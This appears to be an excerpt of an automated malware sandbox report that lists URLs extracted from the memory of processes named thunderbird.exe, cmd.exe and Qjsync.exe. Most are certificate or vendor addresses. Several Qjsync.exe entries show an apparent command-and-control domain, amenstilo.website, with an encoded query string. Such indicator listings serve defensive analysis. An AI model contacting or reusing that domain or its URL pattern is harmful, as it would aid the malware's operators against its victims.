Source: thunderbird.exe, 00000003.00000003.2260894204.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261061954.00000000030F2000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2260778595.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2260293637.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261175868.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261421950.00000000030F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/anyTypeFailure
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crl0a
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://sv.symcd.com0&
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://wpad/wpad.dat
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://wpad/wpad.datnetwork.proxy.autoconfig_urlnetwork.proxy.no_proxies_onnetwork.proxy.failover_ti
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000000.2594143900.00000001401E0000.00000002.00000001.01000000.00000027.sdmp	String found in binary or memory: http://www.???.xx/?search=%s
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BA2000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C09000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.0000000005133000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.0000000002713000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.info-zip.org/
Source: thunderbird.exe, 00000003.00000003.2260894204.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261061954.00000000030F2000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2260778595.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2260293637.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261175868.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000003.2261421950.00000000030F3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com0
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/2002/soap/securityweb-scripts-access.xmlUnknownElementUnknownAttributeElement
Source: thunderbird.exe, 00000003.00000002.2268213706.0000000060293000.00000002.00000001.01000000.00000012.sdmp, thunderbird.exe, 00000003.00000002.2268269622.00000000602A2000.00000002.00000001.01000000.00000013.sdmp, thunderbird.exe, 00000003.00000003.2261061954.00000000030F2000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000002.2268078925.00000000601CB000.00000002.00000001.01000000.0000000B.sdmp, thunderbird.exe, 00000003.00000003.2260778595.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2425210047.00000000601CB000.00000002.00000001.01000000.00000019.sdmp, thunderbird.exe, 00000004.00000002.2425461875.00000000602A2000.00000002.00000001.01000000.00000021.sdmp, thunderbird.exe, 00000004.00000002.2425385382.0000000060293000.00000002.00000001.01000000.00000020.sdmp	String found in binary or memory: http://www.mozilla.org/MPL/
Source: thunderbird.exe, 00000003.00000002.2268213706.0000000060293000.00000002.00000001.01000000.00000012.sdmp, thunderbird.exe, 00000003.00000002.2268269622.00000000602A2000.00000002.00000001.01000000.00000013.sdmp, thunderbird.exe, 00000003.00000003.2261061954.00000000030F2000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000003.00000002.2268078925.00000000601CB000.00000002.00000001.01000000.0000000B.sdmp, thunderbird.exe, 00000003.00000003.2260778595.00000000030F3000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2425210047.00000000601CB000.00000002.00000001.01000000.00000019.sdmp, thunderbird.exe, 00000004.00000002.2425461875.00000000602A2000.00000002.00000001.01000000.00000021.sdmp, thunderbird.exe, 00000004.00000002.2425385382.0000000060293000.00000002.00000001.01000000.00000020.sdmp	String found in binary or memory: http://www.mozilla.org/MPL/Copyright
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/TransforMiixtransformiix:resulttbodyapplication/xmltransformiixResultpre4.0
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/credits/
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/credits/credits#?%Y-%m-%d-%H%M%S.txtnew-all-bloatlogsMemory
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xml
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/newlayout/xml/parsererror.xmllayout.fire_onload_after_image_background_loads8
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/rdf/chrome#name
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/rdf/chrome#packages
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/rdf/chrome#packageshttp://www.mozilla.org/rdf/chrome#namehttp://www.mozilla.o
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/rdf/chrome#platformPackage
Source: thunderbird.exe, 00000003.00000002.2266000536.0000000000B9E000.00000008.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000003.2261588256.0000000004854000.00000004.00000001.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2422176234.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp, thunderbird.exe, 0000000D.00000000.2740895283.0000000000B9E000.00000008.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.mozilla.org/unix/customizing.html#prefs
Source: thunderbird.exe, 00000003.00000000.2157387676.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000003.00000002.2265907816.0000000000A3C000.00000002.00000001.01000000.00000008.sdmp, thunderbird.exe, 00000004.00000002.2422053504.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp, thunderbird.exe, 00000004.00000000.2264998522.0000000000A3C000.00000002.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.netscape.com/newsref/std/cookie_spec.html
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000000.2594143900.00000001401E0000.00000002.00000001.01000000.00000027.sdmp	String found in binary or memory: http://www.softwareok.com
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?Download=Find.Same.Images.OK
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?Freeware/Find.Same.Images.OK/History
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.com/?seite=faq-Find.Same.Images.OK&faq=0
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000000.2594143900.00000001401E0000.00000002.00000001.01000000.00000027.sdmp	String found in binary or memory: http://www.softwareok.de
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?Download=Find.Same.Images.OK
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?Freeware/Find.Same.Images.OK/History
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.3012310782.00000001401F4000.00000002.00000001.01000000.00000027.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.softwareok.de/?seite=faq-Find.Same.Images.OK&faq=0
Source: Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.surfok.de/
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.vmware.com/0/
Source: Qjsync.exe, 0000000C.00000002.2990103682.000000000047C000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2800043144.00000000004E2000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990103682.0000000000449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/
Source: Qjsync.exe, 0000000C.00000003.2800043144.00000000004E2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/(O
Source: Qjsync.exe, 0000000C.00000002.2990103682.000000000047C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/A-$
Source: Qjsync.exe, 0000000C.00000002.2990103682.0000000000449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/F
Source: Qjsync.exe, 0000000C.00000002.2990103682.0000000000449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/J
Source: Qjsync.exe, 0000000C.00000002.2990103682.0000000000449000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/N
Source: Qjsync.exe, 0000000C.00000002.2990103682.000000000047C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/Q-
Source: Qjsync.exe, 0000000C.00000003.2800149190.0000000000463000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990467872.000000000084A000.00000004.00001000.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2800204584.00000000004AC000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990467872.0000000000831000.00000004.00001000.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2778410174.0000000000482000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2943182905.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2943745386.00000000004F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website/courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%2Fsj
Source: Qjsync.exe, 0000000C.00000003.2923611263.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2967722836.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990394887.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2989853396.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2943182905.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2821255012.00000000004FD000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2903508032.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2943745386.00000000004F4000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2884218408.00000000004FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website:443
Source: Qjsync.exe, 0000000C.00000002.2990103682.0000000000497000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website:443/courtney_ryley_cooper_biography.html?jobjbyy11iib4wpr=h3593GdmUsLiBsC%
Source: Qjsync.exe, 0000000C.00000003.2923611263.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2967722836.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990394887.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2989853396.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2943182905.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2903508032.00000000004FA000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2943745386.00000000004F4000.00000004.00000020.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000003.2884218408.00000000004FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website:443H
Source: Qjsync.exe, 0000000C.00000003.2967722836.00000000004FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://amenstilo.website:443~
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/cps0%
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://d.symcb.com/rpa0
Source: Qjsync.exe, 0000000C.00000002.3011558099.0000000007FDF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: Qjsync.exe, 0000000C.00000002.3011558099.0000000007FDF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: thunderbird.exe, 00000003.00000002.2266985552.0000000003BF8000.00000004.00000020.00020000.00000000.sdmp, thunderbird.exe, 00000004.00000002.2423574647.0000000003C5F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: cmd.exe, 00000008.00000002.2660899213.000000000517C000.00000004.00000800.00020000.00000000.sdmp, Qjsync.exe, 0000000C.00000002.2990978047.000000000275C000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: Qjsync.exe, 0000000C.00000002.3011558099.0000000007FD8000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: Qjsync.exe, 0000000C.00000002.3011558099.0000000007FDF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: Qjsync.exe, 0000000C.00000002.3011558099.0000000007FDF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: Qjsync.exe, 0000000C.00000002.3011558099.0000000007FDF000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
